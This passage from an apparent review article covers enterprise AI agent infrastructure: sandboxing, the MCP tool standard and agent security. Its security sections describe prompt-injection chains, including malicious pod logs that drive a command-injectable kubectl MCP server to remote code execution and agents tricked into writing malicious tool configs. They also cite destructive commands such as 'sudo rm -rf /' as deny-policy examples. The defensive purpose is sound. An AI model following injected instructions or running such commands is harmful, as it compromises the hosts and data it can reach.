&lt;td&gt;Google Cloud (GKE)&lt;/td&gt;
&lt;td&gt;Deploy/run Agent Sandbox controller on GKE&lt;/td&gt;
&lt;td&gt;Isolated execution of untrusted commands in cluster; official installation and usage guide&lt;/td&gt;
&lt;td&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/agent-sandbox" rel="noopener noreferrer"&gt;Google Cloud Documentation&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AgentCore "agent sandbox"&lt;/td&gt;
&lt;td&gt;AWS Bedrock AgentCore&lt;/td&gt;
&lt;td&gt;Console testing sandbox&lt;/td&gt;
&lt;td&gt;AWS docs: test agents in agent sandbox&lt;/td&gt;
&lt;td&gt;&lt;a href="https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/develop-agents.html" rel="noopener noreferrer"&gt;AWS Documentation&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Modal Sandboxes&lt;/td&gt;
&lt;td&gt;Modal&lt;/td&gt;
&lt;td&gt;Modal platform sandbox execution unit&lt;/td&gt;
&lt;td&gt;Official example: build code-executing agent with Modal Sandboxes + LangGraph&lt;/td&gt;
&lt;td&gt;&lt;a href="https://modal.com/docs/examples/agent" rel="noopener noreferrer"&gt;Modal&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Vercel Sandbox&lt;/td&gt;
&lt;td&gt;Vercel&lt;/td&gt;
&lt;td&gt;Vercel managed execution environment (Sandbox product)&lt;/td&gt;
&lt;td&gt;For scalable execution (fluid compute/pay-per-active-CPU, etc.)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://vercel.com/sandbox" rel="noopener noreferrer"&gt;Vercel&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Docker Sandboxes (Experimental)&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Local containerized sandbox (for coding agents)&lt;/td&gt;
&lt;td&gt;Docker official: use local isolated environments to run coding agents, enforce boundaries&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.docker.com/blog/docker-sandboxes-a-new-approach-for-coding-agent-safety/" rel="noopener noreferrer"&gt;Docker&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Agent Sandbox on Kubernetes. The Kubernetes-based Agent Sandbox, spearheaded by Google and open-sourced as a SIG project in late 2025, exemplifies state-of-the-art sandbox design. A sandbox instance is essentially a microVM (micro virtual machine) launched per agent session, managed through K8s APIs. Internally it leverages technologies like gVisor (userspace kernel) to intercept syscalls and Kata Containers (lightweight VM isolation) to provide a robust security boundary. This means even if an agent's code tries to perform a malicious syscall or exploit a kernel bug, it's constrained within a sandbox kernel that has minimal privileges on the host. The sandbox also limits network access by default on GKE (only allowing what's necessary for the agent tools), reducing the risk of an agent scanning internal networks or exfiltrating data. At KubeCon NA 2025, Google showcased how they can schedule thousands of sandbox pods in parallel, thanks to the lightweight nature of gVisor, and how pre-warmed sandbox pools enable sub-second startup latencies even with the isolation. This addresses the performance concern that isolation often introduces: by carefully engineering snapshot/restore and pooling, the overhead can be kept low enough for interactive use.&lt;/p&gt;

&lt;p&gt;From an API standpoint, the Sandbox CRD provides features tailored to long-running agent processes: you can specify resource limits, attach persistent volumes for agent state, and use the Kubernetes scheduler to place sandboxes on appropriate nodes (e.g. ones with GPU if the agent needs it). It also has life-cycle controls like scheduled deletion (to clean up sandboxes after use) and the mentioned pause/resume. Collectively, these features fulfill OWASP's top recommendation for mitigating agent risks: "system isolation, access segregation, permission management, command validation, and other safeguards". In fact, OWASP added an entry to its Top 10 for LLMs called "Agent Tool Interaction Manipulation" – the risk of an AI agent being induced to misuse its tools or perform unintended actions. The primary defense listed is to run the agent in a locked-down environment with fine-grained permission controls on what it can do. By confining an agent to a Kubernetes sandbox with only specific Kubernetes API access (or none at all beyond its tools) and no broad host access, even a compromised agent will have limited blast radius.&lt;/p&gt;

&lt;p&gt;Local Sandboxing Solutions. Not all organizations use Kubernetes or need cloud-scale multi-tenancy; for individual developers or on-prem deployment, there are lighter-weight sandbox solutions emerging. One notable project is ERA (by BinSquare), which provides a local sandbox for running AI-generated code with "microVM security guarantees plus containers ease of use". ERA uses technologies like krunvm (firecracker microVM runner) under the hood, orchestrated in a way that feels like using Docker containers. The idea is to give developers a quick way to test AI-written scripts safely on their laptop or CI pipeline, without having to set up full Kubernetes. Similarly, some frameworks allow using WebAssembly (Wasm) sandboxes for certain tasks (since Wasm can restrict file and network access for code running within it). The InfoQ article on sandboxing mentions Lightning AI's LitSandbox and a library called container-use as alternatives, which likely explore isolating Python execution or providing wrapper APIs that simulate a sandbox. While these are not yet as standardized as the Kubernetes Agent Sandbox, they indicate a broad interest in making sandboxing accessible across environments.&lt;/p&gt;

&lt;p&gt;Integration with Agent Frameworks. Modern agent frameworks are starting to build in assumptions about sandboxing. For example, LangChain (one of the earliest agent libraries) historically would just execute Python code or bash commands directly on the host, which is obviously dangerous in production. By late 2025, we see frameworks like LangGraph 1.0 (the evolution of LangChain's agent module) emphasizing "durable and safe" execution, and CrewAI (another open-source agent framework) adding features for asynchronous tool execution and monitoring to potentially plug into sandboxed runtimes. Microsoft's Agent Framework integrates with their Azure Foundry services, which likely means an agent's code execution can be routed to a managed sandbox (e.g. an isolated Azure Function or container instance) – in their blog they highlight "enterprise-grade deployment from the beginning", including security and compliance hooks. We also see new tools like Aspire's AI agent isolation module (by Microsoft) which aims to allow developers to run multiple agent instances in parallel without conflict, hinting at port isolation and MCP proxy layers. All these efforts point to execution isolation becoming a default part of agent system design. It's no longer assumed that an agent's code runs in the same process as the host application or with full OS privileges – instead, agents run in a contained, observable slot, much like how web browsers run untrusted JavaScript in a sandboxed process.&lt;/p&gt;

&lt;p&gt;Transactional and Fault-Tolerant Execution. A sophisticated angle to sandboxing is making execution fault-tolerant. If an agent's action fails or does something unwanted, can we roll it back? One recent research prototype, Fault-Tolerant Sandboxing for AI Coding Agents, introduced a transactional file system wrapper for agent execution. It intercepts file system writes and system changes during an agent's tool use, and if the agent misbehaves or a policy violation is detected, the sandbox can rollback to a clean snapshot. In their experiments, 100% of unsafe actions were intercepted and rolled back, at a cost of ~14.5% performance overhead. However, they note a key limitation: this works for local state (files, processes) but not for external side-effects. If the agent made a cloud API call that created resources or sent emails, a local rollback doesn't undo those. This is pushing the conversation toward distributed transaction semantics for agents – treating a sequence of tool API calls as a saga that might need compensating actions if aborted. While not solved yet, it's a recognized gap (researchers call for integrating compensating transactions for external tools to truly sandbox at the multi-system level). For now, sandboxing primarily ensures the agent's local environment can be reset to a safe state even if one step goes awry.&lt;/p&gt;

&lt;p&gt;Human Takeover and Hybrid Sandboxes. An intriguing development in sandbox design is support for human-in-the-loop interventions not just via yes/no approval prompts, but via full manual control of the sandbox. The idea is that if an agent reaches a step where it is stuck or needs privileged action (like entering a password or solving a tricky problem), a human operator can seamlessly take over the agent's sandbox session, do what's needed, and then hand control back to the AI. The research prototype AgentBay embodies this concept: it provides a unified isolated session that the AI agent can control via API (e.g. issuing OS commands, browser actions) and that a human can remote into graphically at any moment. AgentBay implements a custom Adaptive Streaming Protocol (ASP) to make this possible with very low latency. Unlike traditional screen sharing (RDP/VNC), ASP dynamically switches between sending high-level commands and video frames, adjusting to network conditions and whether the AI or human is currently in charge. The result is a much smoother experience for the human supervisor, even on weaker networks. In tests, allowing a human to intervene in AgentBay's sandbox improved task success rates by over 48% on complex benchmarks, showing the value of fluid HITL (Human-In-The-Loop) control. This approach directly addresses enterprise needs for control: rather than the agent being a black-box automation that might get stuck, it becomes a cooperative automation that an analyst or engineer can jump into whenever needed, without compromising the isolation or requiring the task to be restarted. We foresee future enterprise agent platforms offering a "panic button" or agent assist mode that spawns a secure VNC/Browser session for an operator, all actions logged, then closes back to autonomous mode.&lt;/p&gt;

&lt;p&gt;In summary, sandboxing in agent systems has evolved into a multi-faceted capability: it's not only about securing the environment (with VMs, syscall filters, network restrictions), but also about managing the agent's lifecycle and state (persistent storage, snapshots, warm pools) and facilitating controlled handoffs (pause/resume and human takeover). The investments by major players – e.g. Google building Agent Sandbox as a CNCF project – indicate that these sandboxing techniques will likely become standard infrastructure in cloud platforms. Just as Kubernetes gave us primitives for scalable microservices, we are now getting primitives for safe autonomous agent execution on the cloud and the edge.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Tool Ecosystem and Standardization: From Plugins to MCP
&lt;/h2&gt;

&lt;p&gt;In parallel with sandboxing the runtime, the industry has tackled the tool integration problem for agents. Early agent implementations often hard-coded a set of tools or required developers to write custom "plugin" adapters for each use case. This doesn't scale when enterprises might want agents to access dozens of internal APIs, databases, and third-party services. The last six months have seen a strong push toward standardizing how agents discover and use tools, yielding a more interoperable ecosystem.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Model Context Protocol (MCP) and the AAIF
&lt;/h3&gt;

&lt;p&gt;Model Context Protocol (MCP) has emerged as the de facto standard protocol in this space. As mentioned, MCP defines a client-server schema where the AI agent (client) can list what tools a server offers, call those tools with JSON arguments, and receive results. It also covers things like authentication handshakes (e.g. OAuth flows to let an agent "login" to use a tool on a user's behalf) and streaming responses (for tools that send incremental results). By late 2025, MCP's momentum was cemented by the formation of the Agentic AI Foundation (AAIF) under the Linux Foundation. In December 2025, the Linux Foundation announced AAIF with MCP as a founding contribution alongside OpenAI's AGENTS.md and Block's Goose. The goal is to provide a neutral, open governance home for these agent standards so that no single company controls them. The AAIF launch PR notes MCP had already exploded in adoption: over 10,000 MCP servers published covering everything from dev tools to Fortune 500 internal integrations, and support built into major AI platforms including Claude, ChatGPT, GitHub Copilot, Google Gemini, VS Code, Cursor, and many others. This is remarkable considering MCP was only open-sourced in late 2024 – it resonated because it addressed an urgent pain point: without it, every AI vendor and every enterprise would be duplicating integrations. By rallying around MCP, the community effectively agreed on a "lingua franca" between agents and tools.&lt;/p&gt;

&lt;p&gt;From an enterprise perspective, MCP brings several benefits:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Interoperability: A tool (say a database query interface) can be implemented once as an MCP server and then used by different agents (Anthropic's, OpenAI's, self-hosted ones) without custom adapters. This has analogies to drivers or connectors in classical software – build it once, use anywhere.&lt;/li&gt;
&lt;li&gt;Security and Auditability: MCP messages are structured (JSON) and typically go through a client library in the agent runtime, where they can be logged and inspected. This makes it easier to audit what the agent asked a tool to do, as opposed to the agent running free-form shell commands that are hard to intercept. The protocol includes a capability advertisement step (the server tells what it can do), which can be checked against policies. It also often requires an auth handshake (e.g. OAuth) for the agent to gain access to the tool on behalf of a user, which means existing identity systems can mediate access.&lt;/li&gt;
&lt;li&gt;Modularity and Future-proofing: As InfoQ summarized, MCP shifts integration from a tangled web into a modular architecture, reducing the "plugin fatigue" problem and making it easier to add new tools or swap out models. It also levels the playing field – small open-source projects can publish MCP servers that become as easily usable as those from big vendors, fostering a community ecosystem of tools.&lt;/li&gt;
&lt;li&gt;Neutral Governance: With AAIF, companies like AWS, Google, Microsoft, Anthropic, and OpenAI are all at the same table (indeed all are listed as platinum members). This reduces the risk that MCP splinters into competing versions; it's likely to become analogous to HTML or SQL – a baseline standard that everyone implements, with maybe some extensions.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It's worth noting that MCP is evolving to cover more than just "traditional API calls." Recent extensions include Agent-to-Agent messaging (so an agent can expose itself as a tool to others via MCP) and binary data support (for image and file transfer). The AGENTS.md standard, also under AAIF, complements MCP by providing a way for software projects to declare to agents how to interact with them. AGENTS.md is essentially a README for AI agents, placed in a code repo to describe the project, its build/test tools, key contexts, and constraints. Over 60k open-source repos have adopted AGENTS.md to guide coding agents. By standardizing this, when an agent (like GitHub Copilot or Cursor) is working on a new codebase, it can automatically read AGENTS.md to understand the project's specific commands (e.g. how to run tests) rather than relying on general knowledge. This reduces errors and makes code-writing agents more reliable across different environments.&lt;/p&gt;

&lt;p&gt;MCP Tool Ecosystem. Many companies and open-source teams have published MCP servers for their systems. For instance, GitHub released an official GitHub MCP Server that exposes GitHub operations (issues, PRs, repo contents, etc.) via MCP. This allows an agent to perform GitHub actions (like creating an issue or commenting on a PR) in a safe way – the server enforces GitHub's API policies and scopes. Similarly, we have MCP servers for databases (SQL tools), cloud resources (AWS, Azure MCP servers), information lookups (Wikipedia, web search), and even OS-level tasks (there are MCP servers that wrap shell commands or Docker). A typical enterprise might run a suite of internal MCP servers: one for their ticketing system, one for their customer database, one for DevOps (Kubernetes control like the &lt;code&gt;mcp-server-kubernetes&lt;/code&gt; we saw). By doing so, they create a catalog of approved tools that their AI agents can use. Some companies are building MCP Gateways or registries to manage this catalog, which we'll discuss in the security section.&lt;/p&gt;

&lt;p&gt;Local-First and Offline Agents. While MCP often assumes a client (agent) connecting to a server over HTTP, it's flexible enough to work in "all local" scenarios too (using stdio pipes). The Goose framework (contributed by Block to AAIF) is described as a "local-first AI agent framework". Goose uses MCP for tool extensions – meaning you can run goose agents on your laptop, and they can spin up local MCP servers for local tools (say, accessing a local filesystem or application) without needing cloud connectivity. This is important for cases where data privacy requires everything to remain on-prem or on-device. It also means an enterprise could package up an agent + tool suite to run entirely in an isolated network (e.g. an AI agent that helps with internal network diagnostics, running in a secure enclave with no internet access, but with MCP hooking into internal systems). The push toward standardization via MCP doesn't imply centralization in the cloud – on the contrary, it can democratize who provides tools (open-source implementations, self-hosted services, etc.) as long as they speak the protocol.&lt;/p&gt;

&lt;p&gt;Beyond MCP: Other Standards. While MCP is currently the frontrunner, there are other noteworthy efforts. OpenAPI-based tool use: some agent frameworks allow importing any OpenAPI spec and will auto-generate an "agent tool" from it. For example, Microsoft's Agent Framework highlights that any REST API with an OpenAPI definition can be instantly turned into a tool, with the framework handling schema parsing and secure invocation. This is complementary to MCP: one could imagine MCP servers automatically exposing an OpenAPI, or vice versa. Another is the concept of capability description languages – OpenAI's Function Calling spec is one example, where the model is told function signatures and it outputs JSON for calls. Some researchers propose more formal schemas for tool affordances. At the moment, however, MCP seems to be converging those threads: it provides a structured way for an agent to query "what can I do?" and then invoke a function with arguments, which is essentially function calling over a channel. It's likely we'll see alignment or bridging between OpenAPI, JSON-RPC, and whatever else emerges, to avoid fragmenting this again.&lt;/p&gt;

&lt;p&gt;In essence, if sandboxing addresses the agent's "body," MCP addresses the agent's "arms and legs". It standardizes how the agent reaches out to interact with the world. This was a necessary step for agents to become truly useful in enterprise settings, because no single vendor can supply every integration. By lowering the integration barrier, companies can leverage a far broader set of tools. However, as we'll discuss next, giving an AI agent access to many tools also broadens the attack surface and governance burden – thus, standardization and security have to go hand in hand.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Security, Governance, and Trust in Agent Systems
&lt;/h2&gt;

&lt;p&gt;Deploying autonomous agents in an enterprise inherently raises the question: how do we trust them? Unlike a deterministic script, an AI agent can come up with unexpected actions, and it might be influenced by inputs (or adversaries) in ways we can't fully predict. Over the past months, a significant focus of both practitioners and researchers has been on closing the "trust gap" – ensuring that agents do what they're supposed to and nothing more, or at least that we can detect and mitigate when they misbehave. Several key themes have emerged: permission and policy models, supply chain security of tools, prompt injection defenses, auditing and observability, and fail-safe mechanisms. We'll examine each in turn.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Prompt Injection and Confused Deputy Problems
&lt;/h3&gt;

&lt;p&gt;Prompt injection – where an external input is crafted to manipulate the agent's LLM into ignoring its instructions or performing unintended actions – has proven to be a very real threat. In the context of agent tools, prompt injection can become a "confused deputy" attack: the LLM is the deputy that has privileges (access to tools) and the attacker exploits it via crafted input (a prompt) to misuse those privileges. A simple example: an attacker might embed a malicious command in a user-provided email, which the agent then dutifully executes with its shell tool. Real incidents and proofs-of-concept have shown this is not just theoretical. The consensus in discussions (e.g. on Hacker News) is that prompt injection is analogous to XSS (cross-site scripting) in web apps – you cannot fully eliminate it just by sanitizing inputs, because the model's behavior with arbitrary text is hard to constrain. Thus, relying solely on prompt-based safeguards (like "don't execute if user says to do something bad") is brittle.&lt;/p&gt;

&lt;p&gt;The more robust approach is structural: limit what the agent can do even if it's tricked. This means enforcing policy at the tool invocation layer. For instance, if the agent tries to run a shell command, have a policy that disallows &lt;code&gt;rm -rf&lt;/code&gt; or network calls to sensitive endpoints. If it uses a database tool, ensure it cannot query tables it shouldn't. This is where sandboxing and permission models overlap. In a sandbox, you can intercept system calls – e.g. prevent file writes outside a certain directory, or limit network access to only whitelisted domains. With MCP, you can implement an allow-deny policy per tool – e.g. forbid a certain combination of API calls or detect if the arguments look suspicious (like a SQL query that's dumping all user data).&lt;/p&gt;

&lt;p&gt;One concrete advancement is the research AgentBound framework, which proposes attaching a declarative access control policy to MCP servers. Inspired by Android's app permissions, AgentBound allows a tool to declare what host resources it needs (files, network targets, etc.), and an admin can approve or limit those. At runtime, an enforcement engine monitors the agent's calls and blocks anything outside the allowed scope. Impressively, AgentBound's evaluation auto-generated policies for 296 popular MCP servers with about 80.9% accuracy from the code, and could block the majority of malicious actions with negligible overhead. This suggests that intelligent tooling can help manage the policy burden: we can analyze a tool's code to infer "this tool should only ever need to access X API or Y file", then use that as a sandbox rule.&lt;/p&gt;

&lt;p&gt;Another line of defense is schema validation. Many tools expect inputs of a certain form (JSON with specific fields, numbers in ranges, etc.). If the agent's output deviates, it can indicate either a prompt injection or a model error. Rigorously validating the agent's action format before executing it can catch some attacks or mistakes. In fact, OWASP's recommendation of command validation falls here – e.g. if an agent tries to execute &lt;code&gt;sudo rm -rf /&lt;/code&gt;, the sandbox or tool wrapper should detect that and refuse.&lt;/p&gt;

&lt;p&gt;It's widely acknowledged that prompt injection cannot be fully solved at the model level, so enterprise systems are layering these runtime controls. Some are even exploring two-model setups: one model generates a plan or interprets user input without any tools (and thus with no privileges), then a separate "execution model" with tools enabled but a much more constrained input (only the sanitized plan). This is analogous to separating policy decision and policy enforcement. However, this approach is in its infancy – researchers have noted it's tricky to ensure the two models stay in sync and that the first model doesn't inadvertently become a covert channel for bad instructions.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Tool Supply Chain Security
&lt;/h3&gt;

&lt;p&gt;As the MCP tool ecosystem grows, a new class of security concerns appears: the tools themselves may have vulnerabilities or could be malicious. We've effectively extended our "attack surface" to any code that implements a tool API. In July 2025, security researchers disclosed critical flaws in some community-developed MCP servers:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The MCP Server for Kubernetes (an MCP tool that allowed agents to run &lt;code&gt;kubectl&lt;/code&gt; commands on a cluster) had a command injection flaw. It constructed shell commands from user input without sanitization, so an attacker could embed &lt;code&gt;|&lt;/code&gt; or &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; to execute arbitrary commands on the host. Not only that, the advisory demonstrated a prompt injection chain: if an agent was asked to read a pod's logs (which contained malicious instructions), the agent might then call a vulnerable &lt;code&gt;kubectl&lt;/code&gt; tool with those instructions, leading to RCE (Remote Code Execution) on the MCP server host. This is a vivid example of how an innocuous high-level task (read logs) can cascade into a full compromise via weaknesses in the tool implementation. It underscores that agent security is only as strong as the weakest tool in its arsenal.&lt;/li&gt;
&lt;li&gt;Another advisory for mcp-package-docs (a tool for reading package documentation) had a similar shell injection issue. Essentially, many early tools naively used &lt;code&gt;exec()&lt;/code&gt; on strings, a practice long known to be dangerous in any software context.&lt;/li&gt;
&lt;li&gt;The AI coding assistant Cursor found an even more subtle exploit: an agent could be tricked into writing a malicious MCP server configuration to disk (effectively "installing" a new tool) which would then be loaded and executed, giving the attacker code execution on the system. In response, Cursor had to forbid agents from writing to certain config directories.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These incidents highlight supply chain risk: when you install an MCP server from NPM or pip, do you know it's safe? Could it have a dependency hijacked to steal data? Traditional supply chain best practices – code signing, vetting maintainers, vulnerability scanning – all apply here. But additionally, the dynamic nature of agent tool use requires new thinking. For example, an agent might fetch a tool definition (schema) from somewhere at runtime – that channel could be compromised (a malicious tool listing that lies about what it does). To address this, the community is discussing tool registries with verification. Imagine an "App Store" for MCP tools where each tool is reviewed, sandboxed, and cryptographically signed. The Linux Foundation AAIF might play a role in hosting a global registry, or there may be vendor-specific ones.&lt;/p&gt;

&lt;p&gt;Some researchers call for transparency logs and a "SBOM" (Software Bill of Materials) approach for agent tools. For instance, an enterprise might want a log of every tool version the agent ever used, so if one is later found malicious they can audit past agent runs. They also want assurance that the tool code running is exactly the code that was audited. This is akin to how modern browsers handle extensions: with strict signing and review processes.&lt;/p&gt;

&lt;p&gt;On the defense side, one idea is dynamic tool vetting – before an agent uses a new tool, run that tool in a test mode on known benign inputs to see if it behaves correctly, or run it in a shadow sandbox with instrumented monitoring to detect unexpected actions. This is analogous to how app stores do a review, but potentially automated and at runtime. For now, this is an open research problem; we haven't seen full implementations yet, but it's identified in literature as a needed control.&lt;/p&gt;

&lt;p&gt;In summary, securing the tool ecosystem requires both preventive measures (secure coding practices for tool developers, automated scans for dangerous patterns like &lt;code&gt;execSync&lt;/code&gt; on inputs) and mitigations (running tools with least privilege, e.g. a tool that only needs to read a database should not also have OS write access). The principle of least privilege should apply at every level: the agent only has access to certain tools, the tool only has access to certain system resources. Achieving this in practice means plumbing through the user's identity and intent: e.g., if an agent is acting on behalf of Alice, the database tool should run under Alice's credentials or a role with her permissions, not a superuser. This is an area where enterprise IAM (Identity and Access Management) integration is critical – mapping the human user's identity to the agent's allowed actions. Recent work is exploring how to tie enterprise SSO/OAuth tokens into agent sessions in a fine-grained way, so that an agent cannot escalate its privileges beyond what the user would normally have through regular apps.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.3 Monitoring, Auditing, and Policy Enforcement
&lt;/h3&gt;

&lt;p&gt;Observability is notoriously difficult for AI systems because of their nondeterminism and unstructured outputs. But for agents, observability is non-negotiable in enterprise settings. Operators need to be able to ask: "What sequence of steps did the agent take? Why did it take a certain action? What tool calls were made with what parameters? Did anything unusual happen?" To that end, agent platforms are incorporating extensive logging and tracing capabilities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Structured Traces: There's a push to use standards like OpenTelemetry to trace agent execution like any microservice call graph. Each agent action (e.g. "called Tool X with params Y, got result Z") can be a span in a trace. This allows using existing APM (Application Performance Monitoring) tools to visualize agent workflows. Some commercial platforms now show a real-time step-by-step trace of the agent's reasoning and tool use (often known as an "Agent console" or debug pane).&lt;/li&gt;
&lt;li&gt;Semantic Logging: Beyond raw tool call logs, there's interest in capturing higher-level events. For example, flag if an agent's plan changed drastically mid-execution (could indicate it got confused or was manipulated), or if it requested an unusually large amount of data from a tool. Logging the content of prompts and responses is tricky (for privacy reasons), but logging the intents and outcomes is feasible. Additionally, cryptographic logging (hash chaining the logs) has been suggested so that forensic analysis can trust that logs weren't tampered with.&lt;/li&gt;
&lt;li&gt;Auditing for Compliance: In sectors like finance or healthcare, any automated system needs audit trails for compliance. If an agent made a change to a customer's record, we need to know who/what prompted that and that it was authorized. Solutions here include linking agent actions to a user session and storing that context (e.g. "Agent acted on behalf of Alice, in response to request R, at time T"). Some enterprises restrict certain tools to manual-confirmation mode where a human must approve the agent's action in a dashboard (common for things like executing a trade or sending an email). Ensuring the agent properly presents the action for approval (and doesn't hide the true intent) is an active UX/security challenge.&lt;/li&gt;
&lt;li&gt;Policy Engines: Enterprises are beginning to employ policy-as-code systems (like Open Policy Agent or custom rule engines) to govern agent behavior. For example, a policy might be: "Agents cannot call the production database tool with a WHERE clause missing a limit, unless the user is in admin role." When an agent attempts such a query, the policy engine can intercept and either block it or route it for approval. This ties into MCP Gateway architectures, where instead of the agent connecting directly to tool servers, it connects to a Gateway proxy that mediates all calls. Microsoft's preview of an MCP Gateway shows features like session persistence (to keep agent-tool sessions sticky) and a central place to enforce auth, rate limiting, etc. We can foresee these gateways becoming very sophisticated, implementing org-wide guardrails (e.g. no agent can call external web APIs that are not in a vetted list, to prevent data exfiltration).&lt;/li&gt;
&lt;li&gt;Evaluation and Testing: An emerging practice is to treat agents like code and develop evaluation suites for them. Before deploying an agent update (new model version or new tool), run a battery of scenarios (some normal, some adversarial) to see how it behaves. In late 2025, multiple benchmarks for agent safety were released to facilitate this. The MCP-SafetyBench is one such benchmark: it tests LLM agents on realistic multi-step tasks across five domains (web browsing, financial analysis, code repo management, navigation, and web search) while injecting 20 types of attacks (from prompt tampering to tool output manipulation). The sobering result: no current model is remotely immune to MCP-based attacks – even top-tier models had 30–48% of tasks compromised. They also found a negative correlation between task performance and security: models that are more capable at completing tasks also tend to be more exploitable, presumably because they more eagerly follow any instruction including malicious ones. This points to a fundamental safety-utility trade-off. Enterprises must calibrate how "aggressive" or autonomous they want the agent to be. Some are introducing adjustable risk settings – e.g. a slider from conservative (fewer tools, more confirmations) to aggressive (full autonomy, high risk). A metric called NRP (Normalized Risk-Performance) was proposed to quantify this balance. Ultimately, continuous evaluation will be key: as new attacks are discovered, adding them to test suites and ensuring the agent (with all its tools and policies) can handle or resist them.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  4.4 Identity, Authentication, and Governance
&lt;/h3&gt;

&lt;p&gt;A less glamorous but absolutely crucial aspect is identity and access management (IAM) for agents. When an agent performs an action, whose authority is it under? In a multi-user environment (say an AI assistant in a company), the agent might have to act as different users at different times. Traditional OAuth wasn't designed for a scenario where an LLM is effectively a headless client acting interactively on behalf of a user. Over the past months, developers have hit practical snags integrating OAuth with MCP. For example, the OAuth Dynamic Client Registration used by MCP (so an agent can automatically register itself to use an API) sometimes fails with enterprise IdPs due to strict URL checks. Some IdPs don't allow dynamic clients at all. There are calls to allow static client credentials or out-of-band provisioning for agents in such cases. This is more of a standards gap than a research one – it's being worked through in the MCP working group.&lt;/p&gt;

&lt;p&gt;From an enterprise architecture view, many want the agent to integrate with existing SSO. That means when an employee invokes an agent, the agent should use that employee's OAuth token to access tools. This ensures all actions are attributable and within the user's permissions. It's straightforward for some tools (like an MCP server can simply require a token from the agent), but complex for others (e.g. a shell tool on a server – how to scope that per user?). Some solutions involve impersonation tokens or scoped API keys: e.g. the agent might have a key that only allows certain operations and is tagged to the user.&lt;/p&gt;

&lt;p&gt;The concept of "least privilege" comes into sharp focus here: the agent should only have the minimum access needed for the task, and ideally only for the duration needed. Techniques like OAuth token exchange or short-lived credentials are recommended. If an agent is spun up to do a build job, give it a temporary token that expires after, so even if it went rogue, it couldn't do damage later. One recent architecture paper emphasizes integrating enterprise identity with these agents so that all actions flow through the normal IAM checks and logs of the enterprise. That means, for instance, an agent using a Jira tool would appear in the Jira audit logs as "actions performed via AI agent on behalf of Bob". This transparency is needed for trust – people won't use the agent if it's a black box doing things in the shadows.&lt;/p&gt;

&lt;p&gt;Governance also extends to deciding which tasks to automate vs require human approval, what data agents are allowed to see, and how to prevent data leakage. Some enterprises restrict agents from accessing production data entirely, using them only on sanitized or test datasets until trust is built. Others put heavy monitoring on outputs (e.g. scanning everything the agent is about to output to a user for sensitive data). These are areas where data loss prevention (DLP) tools intersect with AI. A future vision is that an enterprise agent platform will integrate DLP classifiers that flag if an agent's response likely contains company confidential info, and either redact it or alert a human.&lt;/p&gt;

&lt;p&gt;Finally, we must mention user trust and adoption: beyond technical measures, building trust in agents involves user education and incremental rollout. Many organizations start with "read-only" agents (they can suggest actions but not execute them) and then gradually allow more autonomy as confidence grows. By having robust logs and a clear override path, users are more likely to accept the agent's help. Trust is also enhanced by making the agent's reasoning visible (hence the popularity of chain-of-thought traces displayed to users) and by giving users easy ways to correct or stop the agent. In essence, transparency and control are the antidotes to the unpredictability of AI.&lt;/p&gt;

&lt;p&gt;The advancements in the last half-year – from sandbox isolation to protocol standardization and new benchmarks – all aim to shrink the trust gap. Yet, open challenges remain (discussed in the next section) before one can confidently say an autonomous agent is as well-understood and controlled as a traditional software microservice.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Open Challenges and Future Directions
&lt;/h2&gt;

&lt;p&gt;Despite rapid progress, enterprise agent systems still have unsolved research questions and practical gaps. We conclude by highlighting some of the most pressing ones, as identified by recent discussions and publications, which represent opportunities for future work:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Unified Cross-Layer Security Model: Today we have pieces – OAuth for identity, MCP scopes for tool access, sandbox for OS isolation – but they don't always speak the same language. There is no single policy that says, for example, "User X's agent can read from database Y but not write, and can run code but only use 2 CPU and no internet, and these conditions are cryptographically verified." A comprehensive model that ties user identity, agent capabilities, tool permissions, and sandbox OS permissions into one coherent framework is needed. Early proposals like AgentBound (inspired by mobile app permissions) are a start. In the future, we might see capability tokens that encode all these at once – the agent carries a token which the sandbox and tools all check, limiting what it can do in each context. Formal verification of such models (to prove an agent cannot do X) would greatly enhance trust.&lt;/li&gt;
&lt;li&gt;Rollback of External Side Effects: As noted, while we can rollback filesystem changes in a sandbox, we cannot yet rollback an email sent or a transaction made. Developing agent transaction protocols or sagas is an open challenge. One idea is to require critical tools to provide a compensation function – e.g. an MCP server for cloud VMs could have an "undo" for creating a VM (which would delete it). An agent planner could then use these to revert a series of actions if needed. This also ties into training the LLM or using a secondary verifier to decide when to rollback (e.g. if it notices an outcome diverges from expected state). Without solving this, enterprises will be hesitant to let agents perform irreversible operations autonomously.&lt;/li&gt;
